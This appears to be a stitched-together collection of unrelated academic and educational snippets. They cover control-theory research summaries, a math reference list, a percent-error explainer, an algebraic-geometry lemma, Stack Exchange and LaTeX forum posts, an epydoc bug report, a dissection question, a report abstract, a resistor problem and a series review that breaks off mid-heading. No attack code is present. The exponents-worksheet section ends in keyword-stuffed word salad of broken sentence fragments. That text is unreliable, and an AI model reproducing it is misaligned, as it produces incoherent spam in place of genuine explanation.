Event-triggered control is a new paradigm where the discretization of control, instead of being periodic, is allowed to be state-dependent and activated via a trigger function. This is seen as an energy-efficient means of control design. In [10], we investigate the effects of event-triggered control on consensus under switching graph networks and double-integrator agent models. This extends earlier work that assumes static network models.

ifac_poster.pdf

Orientation (attitude) and position control of spacecraft are key components of mission objectives for all space missions. Attitude control is primarily used to ensure that pointing requirements of sensors, solar arrays and other science equipment are satisfied. Synchronisation of multiple spacecraft in orbit is vital for interferometry applications, among others. Our group's work proposes several feedback laws to ensure precise position formation and attitude synchronisation for cooperative applications. The novelty of our results in relation to the literature is two-fold: i) we design coordinate-free control, making use of the rotation matrix directly in the design; ii) the control laws require only line-of-sight measurements, which are easily available and not dependent on absolute attitude measurement.

Line-of-sight based control laws for attitude alignment along the line of sight and formation keeping of two spacecraft in formation are proposed in [3]. The control objective is to achieve attitude alignment about the LOS vector between the two spacecraft and a desired relative distance between the spacecraft. The proposed control laws are distributed in nature and are obtained in the respective body frames. The desired equilibrium configuration under the closed-loop dynamics is shown to be locally asymptotically stable, with a conservative region of attraction specified. The work is extended in [4] to complete attitude synchronization and formation keeping of two spacecraft with a leader using line-of-sight measurements. Each spacecraft measures line-of-sight unit vectors to the other and to the leader spacecraft in its respective body frame, and these line-of-sight measurements are communicated to each other. Lyapunov-like stability analysis is used to prove stability of the desired equilibrium configuration under the closed-loop dynamics. The work is further extended to relative attitude trajectory tracking using line-of-sight measurements in [5], [6], and [7], where the objective is to control the attitudes of the spacecraft so that their relative attitude tracks a desired time-varying relative attitude trajectory.
In [5] a distributed architecture is followed, while in [6] and [7] a serial communication architecture is followed. The attitude control laws are obtained in terms of line-of-sight vectors and guarantee asymptotic tracking of desired attitude trajectories even in the presence of spacecraft translation dynamics under gravity. No observations of external objects such as stars are used, which typically require expensive sensor equipment and complex on-board computation algorithms. The rotation matrix is a global representation of attitude and therefore precludes the possibility of winding-like phenomena typical of parametrizations, which affect uniqueness of solutions. Further, line-of-sight based control laws minimize the need for expensive star sensors and the associated computation for absolute attitude estimation. The results in [3]-[7] therefore have great utility in micro-satellite based multiple-spacecraft missions.

Coverage control refers to the design of feedback laws for multiple robotic agents to optimally cover a convex region of interest. The region is typically of interest in this context due to the unfolding of a phenomenon that requires distributed sensing, such as an oil spill or nuclear radiation. Optimal coverage control involves distributing agents in the region based on the intensity of the sensory function. The centroidal Voronoi configuration has been shown in the literature to be optimal in such applications. Our research extends the literature in several ways: i) we consider a dynamics-level model, instead of the kinematic models in the literature, for a more accurate depiction of a real system; ii) we adapt for unknowns in the dynamics, such as inertia, in addition to the sensory function (as in the literature), to allow for uncertainties [8]. The following plots show sample initial and final positions using our coverage strategy, with large peaks indicated by solid red dots and small peaks by hollow red dots.

In the above experimental investigations, the coverage control algorithms designed by us are applied to mobile ground robots. The phenomenon is the light generated by two LEDs, one brighter and another dimmer. Two different algorithms were arrived at: the top video shows results based on the locational optimisation framework and the bottom video shows results based on an $L_2$ minimisation of the distance between the sensor and light densities. In both cases we notice that more robots settle closer to the higher-intensity light, as expected.

Energy efficiency has emerged as one of the key challenges in recent times for all applications, and event-triggered control is also seen as a means to minimize actuation in control systems. $L_0$ optimal control offers a natural way to design sparse controllers for dynamical systems. In contrast to $L_1$ optimal control laws in the literature, the control magnitudes are precisely zero and not 'close' to zero; the minimization is on the activation time. We have studied both the reachability and linear quadratic problems in this framework to obtain sparse controls [9]. A comparison between the performance of the LQ optimal control and the discontinuous $L_0$ optimal control is shown below.

Gazebo simulation of the Backstepping law on an AR Drone model

Initial hardware trial of the Backstepping law on the AR Drone

AR Drone following an RC car using a Back-stepping algorithm

[1] N. Roy Chowdhury and S. Sukumar, "Persistence based analysis of consensus protocols for dynamic graph networks," in the proceedings of the European Control Conference (ECC), 2014, pp. 886-891.
[2] N. R. Chowdhury, S. Sukumar, and N. Balachandran, “Persistence based convergence rate analysis of consensus protocols for dynamic graph networks.” European Journal of Control, 2016. [3] Warier, R. and Sinha, A., “LOS based attitude alignment of two spacecraft in formation,” 5th International Conference of Spacecraft Formation Flying Missions and Technologies, Munich, 2013. [4] Warier, R., Sinha, A. and Srikant, S., “Spacecraft Attitude Synchronization And Formation Keeping Using Line Of Sight Measurements,” Proceedings of 19th IFAC World Congress, Cape Town, 2014. [5] Warier, R., Sinha, A. and Srikant, S., “Relative Attitude Trajectory Tracking Using Line of Sight Measurements under Spacecraft Position Dynamics,” Advances in Control and Optimization of Dynamical Systems, Vol.3, No. 1, 2014, pp.455-461. doi: 10.3182/20140313-3-IN-3024.00236 [6] Warier, R., Sinha, A. and Srikant, S., “Line Of Sight Based Spacecraft Formation Control Under Gravity,” Indian Control Conference, Chennai, 2015. [7] Warier, R., Sinha, A. and Srikant, S., “Line-of-sight Based Attitude and Position Tracking Control For Spacecraft Formation,” European Journal of Control, 2016. doi: 10.1016/j.ejcon.2016.04.001 [8] Razak R. A. , Srikant S. and Chung H., “Decentralized Adaptive Coverage Control of Nonholonomic Mobile Robots” , 10th IFAC Symposium on Nonlinear Control Systems (NOLCOS 2016), August 23-25, 2016 [9] Srikant S. and Chatterjee D., “A jammer's perspective of reachability and LQ optimal control”, Automatica , Vol. 70, August 2016, Pages 295–302 [10] S. Arun Kumar, N. R. Chowdhury, S. Srikant, J. Raisch, “Consensus Analysis of Systems with Time-varying interactions: An Event-triggered Approach”, 20th IFAC World Congress, Toulouse, France, July 2017
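As a minimal, self-contained illustration of the baseline consensus dynamics that the work above builds on (a fixed, undirected graph with constant edge weights; the time-varying, switching and event-triggered cases in [1], [2] and [10] generalise this setting), the following sketch simulates the standard discrete-time consensus iteration. The graph and the numerical values are hypothetical and not taken from the cited papers.

```python
import numpy as np

# Four agents on a path graph; L is the graph Laplacian.  With a small enough
# step size, x_{k+1} = x_k - eps * L x_k drives all states to the average of
# the initial values (average consensus).
A = np.array([[0, 1, 0, 0],
              [1, 0, 1, 0],
              [0, 1, 0, 1],
              [0, 0, 1, 0]], dtype=float)   # adjacency matrix (path graph)
L = np.diag(A.sum(axis=1)) - A              # graph Laplacian
x = np.array([1.0, -2.0, 4.0, 0.5])         # initial agent states (hypothetical)
eps = 0.2                                   # step size (hypothetical, small enough for stability)

for _ in range(200):
    x = x - eps * (L @ x)                   # consensus update

print(x)          # all entries converge towards ...
print(x.mean())   # ... the average of the initial states (0.875)
```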
# Proofs Without Words - References - Acknowledgments - About the Authors

Author(s): Tim Doyle (Whitman College), Lauren Kutler (Whitman College), Robin Miller (Whitman College), and Albert Schueller (Whitman College)

### References

1. Alsina, Claudi, and Roger B. Nelsen. Math Made Visual: Creating Images for Understanding Mathematics. Washington, DC: Mathematical Association of America, 2006.
2. Alsina, Claudi, and Roger B. Nelsen. When Less Is More: Visualizing Basic Inequalities. Washington, D.C.: Mathematical Association of America, 2009.
3. Boyer, Carl B., A History of Mathematics (2nd edition), John Wiley & Sons, Inc., 1991.
4. Burge, T., "Frege on Knowing the Foundation," Mind, Vol. 107, No. 426 (1998), pp. 305-347.
5. Burge, T., Truth, Thought, Reason: Essays on Frege, Oxford University Press, 2005.
6. Byrne, Oliver, The first six books of the Elements of Euclid, in which coloured diagrams and symbols are used instead of letters for the greater ease of learners. London: W. Pickering, 1847.
7. Cooke, Roger, "The Mathematics of the Hindus," The History of Mathematics: A Brief Course, Wiley-Interscience, pp. 213-215, 1997.
8. Doyle, Timothy, "The Mathematical Content of Meno 82b-85b," Draft manuscript, presented at the Northwest Philosophy Conference, Pacific University, October 2013.
9. Dummett, Michael, Frege: Philosophy of Mathematics, Harvard University Press, 1991.
10. Frederickson, Greg N., Dissections: Plane & Fancy, Cambridge University Press, 1997.
11. Frege, Gottlob. The Foundations of Arithmetic: A Logico-mathematical Enquiry into the Concept of Number. Evanston, IL: Northwestern UP, 1980.
12. Fry, Alan L., "Sum of Cubes," Mathematics Magazine, Vol. 58, No. 1 (1985), p. 11.
13. Gallant, Charles D., "A Truly Geometric Inequality," Mathematics Magazine, Vol. 50, No. 2 (1977), p. 98.
14. Gerstein, Larry J., Introduction to Mathematical Structures and Proofs, Springer Publishing, 1996.
15. Goodfriend, Jason, Gateway to Higher Mathematics, Jones and Bartlett Learning, 2005.
16. Gossett, Eric, Discrete Mathematics With Proof, John Wiley and Sons, 2009.
17. Isaacs, Rufus, "Two Mathematical Papers without Words," Mathematics Magazine, Vol. 48, No. 4 (Sep., 1975), p. 198.
18. Katz, Victor J., A History of Mathematics, Harper-Collins, 1993.
19. Kawasaki, Ken-ichiroh, "Viviani's Theorem," Mathematics Magazine, Vol. 78, No. 3 (2005), p. 213.
20. Kung, Sidney H., "The Law of Cosines," Mathematics Magazine, Vol. 63, No. 5 (1990), p. 342.
21. Lakatos, Imre. Proofs and Refutations: The Logic of Mathematical Discovery. Cambridge: Cambridge UP, 1976.
22. Lucas, John F., Introduction to Abstract Mathematics (2nd edition), Ardley House Publishers, 1990.
23. Mabry, Rick, "Proof Without Words: $(1/4) + (1/4)^2 + (1/4)^3 + \cdots = 1/3$," Mathematics Magazine, Vol. 72, No. 1 (1999), p. 63.
24. Morash, Ronald P., Bridge to Abstract Mathematics: Mathematical Proof and Structures (2nd edition), McGraw Hill, 1991.
25. "News and Letters," Mathematics Magazine, Vol. 49, No. 1 (Jan., 1976), pp. 49-52.
26. Nelsen, Roger B., Interview with Robin Miller, March 23, 2012.
27. Nelsen, Roger B., "Proof without Words: The Harmonic Mean - Geometric Mean - Arithmetic Mean - Root Mean Square Inequality," Mathematics Magazine, Vol. 60, No. 3 (June, 1987), p. 158.
28. Nelsen, Roger B. Proofs without Words: Exercises in Visual Thinking. Washington, D.C.: Mathematical Association of America, 1993.
29. Nelsen, Roger B. Proofs without Words II: More Exercises in Visual Thinking.
Washington, DC: Mathematical Association of America, 2000. 30. Plato, Meno (2nd edition), G.M.A. Grube, translator, Hackett, 1976. 31. Romaine, William, "(no title)," Mathematics Magazine, Vol. 61, No. 2 (1988), p. 113. 32. Siu, Man-Keung, Personal email to Albert Schueller, June 10, 2014. 33. Siu, Man-Keung, "Proof without Words: Sum of Squares," Mathematics Magazine, Vol. 57, No. 2 (1984), p. 92. 34. Steen, Lynn A., Personal email to Robin Miller, April 20, 2012. 35. Steiner, Mark, "Mathematical Proof" in Philosophy of Mathematics: An Anthology, ed. Dale Jacquette, Blackwell Publishers, 2002. 36. Swetz, Frank J. and Katz, Victor J., "Mathematical Treasures - Oliver Byrne's Euclid," Loci: Convergence (January 2011). 37. Wolf, Robert S., Proof, Logic, and Conjecture: The Mathematician's Toolbox, W.H. Freeman and Company, 1998. 38. Wolf, Samuel, "(No title)," Mathematics Magazine, Vol. 62, no. 3 (1989), p. 190. 39. Yates, Robert C., "The Trisection Problem," National Mathematics Magazine, Vol. 15, no. 6 (1941), pp. 278-293. ### Acknowledgments The authors wish to thank Moira Gresham, a member of the Department of Physics at Whitman College, and E. Sonny Elizondo, a member of the Department of Philosophy at UC Santa Barbara, for their thoughtful feedback on this paper.
# Calculating percentage error (physics)

Percent error (or percentage error) expresses, as a percentage, the difference between an approximate or measured value and an exact or known value. It is often used in science to report the difference between experimental values and expected values. To compare an approximate value to an exact one, subtract one from the other, divide by the exact value, and make it a percentage. Percent error is taken with respect to the known quantity, and since a percentage is conventionally reported as positive, we invoke the absolute value:

$$E=\frac{|A-B|}{B}\times 100$$

(equivalently $E=\frac{|B-A|}{B}\times 100$, so it does not matter in which order you subtract; standard references such as Wikipedia and Wolfram likewise divide by the known value $B$). The absolute value of a positive number is the number itself, and the absolute value of a negative number is simply the number without its negative sign. If you need to know whether the error is positive or negative, drop the absolute value brackets; a negative error simply means the experimental value is smaller than the accepted value. There is no particular reason to prefer division by $A$ or by $B$ in general, and it is not true that the sign never matters.

Worked examples:

- You measure 9 where the real value is 10: divide −1 (the result of subtracting 10 from 9) by 10, the real value, giving −10%. Just add the percentage symbol to the answer and you're done.
- They forecast 20 mm of rain, but we really got 25 mm: (20 − 25)/25 × 100% = −20%.
- A measured pendulum period that comes out smaller than the theoretical value (using physics formulas) of 0.64 seconds gives a negative error.
- If an estimate is off by 65 from an exact value of 325, divide by the exact value and make it a percentage: 65/325 = 0.2 = 20%.
- A related propagation-of-error exercise: if the percentage errors in the measured time period T and length L of a simple pendulum are 0.2% and 2% respectively, what is the maximum percentage error in LT²?

A high percent error must be accounted for in your analysis of error, and may also indicate that the purpose of the lab has not been accomplished. Common sources of measurement error include:

- Instrument resolution - a meter stick cannot distinguish distances to a precision much better than about half of its smallest scale division (0.5 mm in this case). Similarly, if you measure a plant to be 80 cm high to the nearest cm, you could be up to 0.5 cm off (the plant could be anywhere between 79.5 and 80.5 cm). When measuring a millimetre-scale dimension with an instrument of micron resolution, one would normally quote a tolerance on the nominal dimension rather than a percent error.
- Parallax (systematic or random) - this error can occur whenever there is some distance between the measuring scale and the indicator used to obtain a measurement. If the observer's eye is not squarely aligned with the pointer and scale, the reading may be too high or too low (some analog meters have mirrors to help with this alignment).
- Lag time and hysteresis (systematic) - some measuring devices require time to reach equilibrium, and taking a measurement before the instrument is stable will give an erroneous reading.
- Drift - the amount of drift is generally not a concern, but occasionally this source of error can be significant and should be considered.
- Random errors - these can be reduced by averaging over a large number of observations; taking repeated measurements, or measuring the same quantity by two different methods (for instance, two ways of determining the speed of a rolling body), often reveals variations that might otherwise go undetected. With a comparison method, problems of source instability are eliminated, and the measuring instrument can be very sensitive and does not even need a scale.
- "Human error" - this term should be avoided in error analysis discussions because it is too general to be useful. The experimenter may measure incorrectly, may use poor technique in taking a measurement, or may introduce a bias by expecting (and inadvertently forcing) the results to agree with the anticipated outcome. As a rule, gross personal errors are excluded from the error analysis discussion because it is generally assumed that the experimental result was obtained by following correct procedures. The best way to account for the remaining sources of error is to brainstorm with your peers about all the factors that could possibly affect your result.

Finally, note that a bare percent difference against theory is not very informative on its own: there is no way to know whether a 0.03% difference is consistent with the theory or inconsistent with it, because that depends on the uncertainty of the measurement. Real science has to find a way to quantify precision and uncertainty without reference to a predetermined correct value.
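As a small illustration of the formula above (a hypothetical helper, not code from any of the quoted sources):

```python
def percent_error(measured, accepted, signed=False):
    """Percent error of a measurement relative to the accepted (exact) value.

    By default the absolute value is returned; pass signed=True to keep the
    sign (negative when the measurement is below the accepted value).
    """
    error = (measured - accepted) / accepted * 100.0
    return error if signed else abs(error)

print(percent_error(9, 10))                # 10.0
print(percent_error(20, 25, signed=True))  # -20.0 (the rainfall forecast example)
```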
Lemma 70.4.7. Let $S$ be a scheme. Let

$\xymatrix{ X' \ar[d]_{f'} \ar[r]_{g'} & X \ar[d]^ f \\ Y' \ar[r]^ g & Y }$

be a cartesian diagram of algebraic spaces over $S$. Let $\mathcal{F}$ be a quasi-coherent $\mathcal{O}_ X$-module and set $\mathcal{F}' = (g')^*\mathcal{F}$. If $f$ is locally of finite type, then

1. $x' \in \text{Ass}_{X'/Y'}(\mathcal{F}') \Rightarrow g'(x') \in \text{Ass}_{X/Y}(\mathcal{F})$,
2. if $x \in \text{Ass}_{X/Y}(\mathcal{F})$, then given $y' \in |Y'|$ with $f(x) = g(y')$, there exists an $x' \in \text{Ass}_{X'/Y'}(\mathcal{F}')$ with $g'(x') = x$ and $f'(x') = y'$.

Proof. This follows from the case of schemes by étale localization. We write out the details completely. Choose a scheme $V$ and a surjective étale morphism $V \to Y$. Choose a scheme $U$ and a surjective étale morphism $U \to V \times _ Y X$. Choose a scheme $V'$ and a surjective étale morphism $V' \to V \times _ Y Y'$. Then $U' = V' \times _ V U$ is a scheme and the morphism $U' \to X'$ is surjective and étale.

Proof of (1). Choose $u' \in U'$ mapping to $x'$. Denote $v' \in V'$ the image of $u'$. Then $x' \in \text{Ass}_{X'/Y'}(\mathcal{F}')$ is equivalent to $u' \in \text{Ass}(\mathcal{F}|_{U'_{v'}})$ by definition (writing $\text{Ass}$ instead of $\text{WeakAss}$ makes sense as $U'_{v'}$ is locally Noetherian). Applying Divisors, Lemma 31.7.3 we see that the image $u \in U$ of $u'$ is in $\text{Ass}(\mathcal{F}|_{U_ v})$ where $v \in V$ is the image of $u$. This in turn means $g'(x') \in \text{Ass}_{X/Y}(\mathcal{F})$.

Proof of (2). Choose $u \in U$ mapping to $x$. Denote $v \in V$ the image of $u$. Then $x \in \text{Ass}_{X/Y}(\mathcal{F})$ is equivalent to $u \in \text{Ass}(\mathcal{F}|_{U_ v})$ by definition. Choose a point $v' \in V'$ mapping to $y' \in |Y'|$ and to $v \in V$ (possible by Properties of Spaces, Lemma 65.4.3). Let $t \in \mathop{\mathrm{Spec}}(\kappa (v') \otimes _{\kappa (v)} \kappa (u))$ be a generic point of an irreducible component. Let $u' \in U'$ be the image of $t$. Applying Divisors, Lemma 31.7.3 we see that $u' \in \text{Ass}(\mathcal{F}'|_{U'_{v'}})$. This in turn means $x' \in \text{Ass}_{X'/Y'}(\mathcal{F}')$ where $x' \in |X'|$ is the image of $u'$. $\square$
# Why does MathJax not render in comments on the mobile app? [duplicate]

I sometimes read SX stuff from the app on my Android. Today, I found myself reading a question from Math.SX. To my surprise, after a while, I noticed a problem in the comments, which this screenshot records:

If you are curious about the question, it is this one. Anyway, as you can see (hopefully the image is not too small, but the dollars seem pretty visible to me), MathJax is not rendered in those comments. This is very bad, because in this case there isn't much complication, and besides, I am very accustomed to LaTeX; but imagine something far more complex (integrals with limits, sums, or the like) written by a user whose LaTeX is bad or unpractised: the comments, thus unrendered, become unreadable.

So why is MathJax not rendered in comments, whereas it is in the question? And why does this only happen in the app, not the site?

Addendum: Is there a more "logical" way of reducing the image besides copying the HTML code from this answer, code placed there by Firelord in an edit, every time I post a screenshot and it is terribly huge?

To be extra clear: this is NOT the question. I'm adding this sentence because it has happened to me that I asked a question, then faced a formatting problem while posting it and asked about it as an extra, like here, and got faced with answers addressing only the extra. Please don't.

Update: Yes, the question this has been marked a duplicate of (i.e. this one) is strongly related to it. However, as the titles already show, they are not the same. It is interesting to know this is by design rather than a bug, and even more so to know that by tapping on a comment, clicking the vertical ellipsis $$\vdots$$ in the top-right corner and choosing "render MathJax", one can get the comment with rendered MathJax to appear in the middle of the screen; but that doesn't answer why things are that way. Why should MathJax not render in comments in the app? This was my question.

• It looks to me like this question should not be marked as a duplicate. The linked, answered post is reporting the behavior as a bug, and is tagged with status-bydesign. As I'm reading it, this question is instead asking about the rationale for that design - asking Why is it designed to behave this way? Jun 7 '17 at 14:50
• Also: I did find what may be a hint of the answer to the question of "why is it designed this way" in this post by Kasra Rahjerdi. Quoted in part (and very mildly paraphrased): "Adding MathJax / LaTeX to question and answer bodies is really easy, but adding it to comments, question titles, and the question listings is troublesome. Since everything in the app other than the question/answer bodies are native code rather than webviews, this is going to take us a while to try and figure out. At the moment we're putting it on the backburner." Jun 7 '17 at 14:52
Questions include some basic theory, scientific notation, simplifying algebraic expressions and solving basic exponential equations. The exponents worksheets cover writing factors, finding square roots and cube roots, simplifying exponent expressions and the different operations with exponents; related sets cover fractions, order of operations and properties of exponents. Exponents have become an integral part of understanding fundamental numeric nomenclature and the order of operations (PEMDAS), so these sheets introduce exponent syntax, calculation of simple exponents, powers of ten and scientific notation, and provide practice finding the actual value of common exponents.

An exponent indicates repeated multiplication of the same base: for example, 8 × 8 × 8 is written as 8³. Product rule: when multiplying powers (monomials) that have the same base, write the base and add the exponents. Quotient rule: when dividing powers with the same base, write the base and subtract the exponents. Rational exponents are defined so that these rules still hold; for example, we define 5^(1/3) to be the cube root of 5 because we want (5^(1/3))³ = 5^((1/3)·3) to hold, so (5^(1/3))³ must equal 5. Scientific notation is used because it isn't practical to write out really long numbers: a number like \(42,000,000,000,000,000,000,000,000\) is compressed to \(4.2\cdot10^{25}\). Further sheets practise multiplying decimals by positive powers of ten (exponent form) and converting between scientific notation and standard form for small and large numbers, with positive and negative exponents and decimals as bases.

The worksheets are printable PDF exercises of the highest quality, suitable from roughly fifth grade through eighth grade (CCSS 7.EE), with easier sheets for younger learners; the problem statements in the 5th-grade worksheets are the easiest, and students will solve them readily once they understand the basics. Each sheet has an answer key attached on the second page, and worked solutions include step-by-step practice problems as well as challenge questions at the end. The worksheets can be generated in html or PDF format (both are easy to print). Teachers can print and use them for class work or holiday assignments, parents can download and print them for additional practice at home, and students can use them to master a skill through practice, in a study group or for peer tutoring.
Improve their math skills monomials that have the same write the base and add the exponents functioning of website also! 5 math worksheet for kids with answer key attached on the second page downloadable zip file with 100 math exercises... The worksheet and use for practice or in your classroom starts in PDF... & practice 1 the syllabus for Class 7 Maths worksheet - exponents & Powers ( 7 worksheets! And the students will easily solve them if they understand the basics worksheet produces problems for working exponents... An answer key attached on the 2nd page of the worksheets can be made in html or PDF format both. With different operations on exponents Kuta Software - Infinite Algebra 1 - exponents & Powers ( 7 ) have... Keep it free forever Radicals multiplication property of exponents Algebra worksheets learning multiplication, exponents are an part... Simplyfing exponent expressions and different operations with scientific notation, simplifying algebraic expressions and solving basic equations. With like bases, worksheet # 1 standard level, get them here it originate from resource... 1 1 6 a. multiplying decimals by positive Powers of Ten and scientific notation sheets attached each! Improve their math skills by step, practice problems, as well as challenge questions at sheets. Math educators and parents in math topic - basic Algebra ) worksheets have an. By step, practice problems, as well as challenge questions at the sheets end basic exponents a content-rich zip. 8 8 is written as 8 3 parents can download these exponents worksheets this is the currently selected item roots. And KVS standards is the currently selected item, power rule, negative exponent rule and. Numeric nomenclature and order of operations worksheets the worksheets can be made in html or PDF format both easy! And task cards to help students learn about exponents is not practical to write really. Same, write the answer key provided 42 5 Software LLC Kuta Software - Infinite Algebra Name_____...: the worksheets come with an answer key on the 2nd page of the education system use a or.
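A compact worked illustration of the exponent rules mentioned above (standard algebra identities, added for reference):

$x^3 \cdot x^4 = x^{3+4} = x^7, \qquad \frac{x^5}{x^2} = x^{5-2} = x^3, \qquad (x^2)^3 = x^{2\cdot 3} = x^6, \qquad x^0 = 1 \ (x \neq 0).$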
1. Thanks for those tips! This is exactly the problem I struggled with in the last two weeks. Too bad the submission deadline for my documentation was last Friday; but thanks to your post, I can handle this issue in the future 🙂

• tom Thanks Micha. Too bad I was a bit too late with this. Cheers, Tom

• tom Hi Christophe, Thanks for your comment, I completely agree. However, when I mentioned Apple all I had in mind was alternate coloring of rows. This simple trick increases the readability of a table, which is ultimately what the post is about. I could have been more clear on that point. Thanks for the link, really cool animation… Tom

2. Arwen great work!! Thank you very much!

3. I'm definitely looking for a way to colour rows not alternately like here above, but once every nth row (like I can do in MS Excel…), and automatically, like for even and odd row colours. Would somebody know how this is feasible?

• tom Coloring every even and odd row with a different color can be done as shown here (see also the \rowcolors sketch at the end of these comments). For a different pattern, you would probably have to do it manually. Cheers, Tom.

4. Raphael Hi Tom, this is an excellent post and helped me already a lot. The only problem I am struggling with, and on which I did not find a solution yet, is the text alignment of the multirow cells. I don't want the text to be aligned in the center of the multirow cells but at the top. Do you have any suggestions on that? Thanks and best regards, Raphael

• tom Hi Raphael, Could you just place the content in the top cell then? Would that be a problem? Please provide a minimal working example. Thanks, Tom

• tom Hi Alex, Thanks for your question and the link to the example. Given the table, there are several issues that arise when trying to color alternate rows as shown in the post above. For more complex tables, it may sometimes be easier to manually color individual rows and additional cells. Cheers, Tom

5. Hani Hi Tom, Thanks a lot for your technique. I've been struggling with it lately and your post helped me a lot. Just one question: how can I color two consecutive rows and still have the solid border line between them? When you color them, the border line is gone (\hline is still present in the latex code but it doesn't show up in the table!) Thanks, Hani

• tom Hi Hani, Thanks for your question. In the minimal example below, the line between two colored rows is visible. Please provide a similar example that illustrates your problem. Thanks, Tom.

\documentclass[border=10pt]{standalone}
\usepackage[table]{xcolor}
\begin{document}
\begin{tabular}{cc}\hline
\rowcolor{green}c&d\\\hline
\rowcolor{blue}a&b\\\hline
\end{tabular}
\end{document}
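Following up on the even/odd coloring mentioned in the comments above, here is a minimal sketch using the \rowcolors command provided by the xcolor package's table option; the colors and the three-row table are placeholders:

```latex
\documentclass[border=10pt]{standalone}
\usepackage[table]{xcolor}
\begin{document}
% \rowcolors{<first row>}{<odd-row color>}{<even-row color>}
\rowcolors{1}{gray!20}{white}
\begin{tabular}{cc}\hline
a & b \\\hline
c & d \\\hline
e & f \\\hline
\end{tabular}
\end{document}
```

For a period other than two, there is no built-in analogue, so coloring every nth row typically means placing \rowcolor manually on the relevant rows.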
## #285 Parameters shows up in wrong place

open · Edward Loper · 5 · 2008-07-29 · 2008-07-29 · Neal Becker · No

```python
def quartic_interp_coef (x):
    """
    Return a tuple of Lagrange interpolator coefficients.

    :Parameters:
      x : float
        The time offset (1 = 1 sample)
    """
```

When rendered as HTML this is OK, but in the PDF output the 'Parameters' heading ends up on the same line as the description. Here is the latex:

```latex
Return a tuple of Lagrange interpolator coefficients.
\setlength{\parskip}{1ex}
\textbf{Parameters}
\vspace{-1ex}
```

## Discussion

• Edward Loper — 2008-07-29 — Logged In: YES (user_id=195958), Originator: NO
Did you tell epydoc to use restructured text as the markup language, using either __docformat__ or '--docformat'? (see <http://epydoc.sourceforge.net/manual-othermarkup.html>)

• Logged In: NO
Yes, the rendering in latex is incorrect: the 'Parameters' is shown in bold, but not on a new line.
# coarser than triangulations: "almost partitions" into simplices

The total space $T$ of a pure $n$-dimensional simplicial complex embedded into $\mathbb{R}^n$ (in other words, the union of finitely many $n$-dimensional compact convex polytopes) sometimes admits an "almost partition" into $n$-simplices (i.e. $T$ equals the union of these simplices, and the interiors of these simplices do not, pairwise, intersect) which is coarser than a triangulation. For instance, consider the union $T$ of two tetrahedra $T_1$, $T_2$ in $\mathbb{R}^3$ which intersect at the mid-point $M=E_1\cap E_2$ of edges $E_i\in T_i$, $1\leq i\leq 2$. Then any triangulation of $T$ will have to include $M$ as a vertex, and will have at least 4 simplices. On the other hand, there exists an obvious "almost partition" of $T$ into just 2 simplices, $T_1$ and $T_2$. We wonder whether there exists any research on these kinds of "almost partitions", and whether there is any well-established terminology here.

- The term "triangulation" tends to be ambiguous, as it appears in both a geometric and a topological context. In this case, what you want is called a dissection, at least in the discrete geometry literature (see e.g. here and there). P.S. Oh, yes, plenty of research. See e.g. here for whether dissections of convex polytopes can be smaller than triangulations.

- Thanks a lot. It's very useful. Especially the fact that two dissections are connected by elementary moves (unlike triangulations) simplifies our problems a lot. Are there any plans for your book to be published? –  Dima Pasechnik Jul 27 '12 at 4:14
# The Complexity of Finding Most Vital Arcs and Nodes

Authors: Amotz Bar-Noy, Samir Khuller, Baruch Schieber
Created: November 1995 — Issued: 1998-10-15
Type: Technical Report
Series: UM Computer Science Department CS-TR-3539; UMIACS-TR-95-96
URI: http://hdl.handle.net/1903/763

Abstract: Let $G(V,E)$ be a graph (either directed or undirected) with a non-negative length $\ell(e)$ associated with each arc $e$ in $E$. For two specified nodes $s$ and $t$ in $V$, the $k$ most vital arcs (or nodes) are those $k$ arcs (nodes) whose removal maximizes the increase in the length of the shortest path from $s$ to $t$. We prove that finding the $k$ most vital arcs (or nodes) is NP-hard, even when all arcs have unit length. We also correct some errors in an earlier paper by Malik, Mittal and Gupta [ORL 8:223-227, 1989]. (Also cross-referenced as UMIACS-TR-95-96)

Available at: Digital Repository at the University of Maryland; University of Maryland (College Park, Md.); Tech Reports in Computer Science and Engineering; UMIACS Technical Reports
# A resistor of 20 cm length and resistance 5 ohm is stretched to a uniform wire of 40 cm length. The resistance now is:

1. 40 ohm
2. 10 ohm
3. 20 ohm
4. 30 ohm

Correct answer: Option 3 — 20 ohm

## Detailed Solution

Concept:

Resistance:
- Resistance is a measure of the opposition to current flow offered by the material of the conductor. It is denoted by R.
- The resistance R of a conductor depends on its length L and uniform cross-sectional area A through the relation
$$R = \frac{\rho L}{A}$$
where ρ, called resistivity, is a property of the material and depends on temperature and pressure, and L is the length of the conductor.

Calculation:

Given:
Initial length of the conductor = 20 cm
Final length of the conductor = 40 cm
Initial resistance of the conductor = 5 Ω

Let the initial and final cross-sectional areas of the conductor be A and A′ respectively. On stretching the wire, the volume of material remains the same, hence

Initial volume = final volume
⇒ A × L = A′ × L′
⇒ A × 20 = A′ × 40
$$⇒ A' = \frac{A}{2}$$   ..........(1)

Now, the initial resistance is $$R = \frac{\rho L}{A}$$     .....(2) and the final resistance is $$R' = \frac{\rho L'}{A'}$$   .......(3)

Dividing (3) by (2):
$$\frac{R'}{R} = \frac{\rho L'}{A'} \times \frac{A}{\rho L} = \frac{40 \times 2 \times A}{20 \times A} = 4$$
⇒ R′ = 4 × 5            (∵ R = 5 Ω)
⇒ R′ = 20 Ω

Hence, the resistance of the stretched wire is 20 Ω.

Alternate Method

If the initial resistance of the wire is R and it is stretched to n times its initial length, then the final resistance is R′ = n²R. Here the wire is stretched to 2 times its initial length, so R′ = 2² × 5 = 20 Ω (∵ initial resistance = 5 Ω).
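A minimal numeric check of the n²-scaling used in the alternate method above (plain Python, added for illustration):

```python
def stretched_resistance(r_initial, stretch_factor):
    # Volume is conserved: L -> n*L implies A -> A/n,
    # so R = rho*L/A scales by a factor of n**2.
    return r_initial * stretch_factor ** 2

print(stretched_resistance(5, 40 / 20))  # 20.0 ohm
```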
# Review of Series and Sequences - MATH 191 - SERIES

SERIES
- $p$-series $\sum 1/n^p$: convergent if $p > 1$, divergent if $p \leq 1$.
- Geometric series $\sum ar^{n-1}$ or $\sum ar^n$: converges if $|r| < 1$, diverges when $|r| \geq 1$.
- If the series has a form that is similar to a $p$-series or a geometric series, then one of the comparison tests should be considered.
- If $\sum a_n$ has some negative terms, then we can apply the Comparison Test to $\sum |a_n|$ and test for Absolute Convergence.
- If $a_n$ is of the form $(b_n)^n$, then the Root Test may be useful.
- If $a_n = f(n)$, where $\int_1^{\infty} f(x)\,dx$ is easily evaluated, then the Integral Test is effective (if the hypotheses of the test are satisfied).

COMPARISON TESTS – Suppose that $\sum a_n$ and $\sum b_n$ are series with positive terms.

Direct comparison test
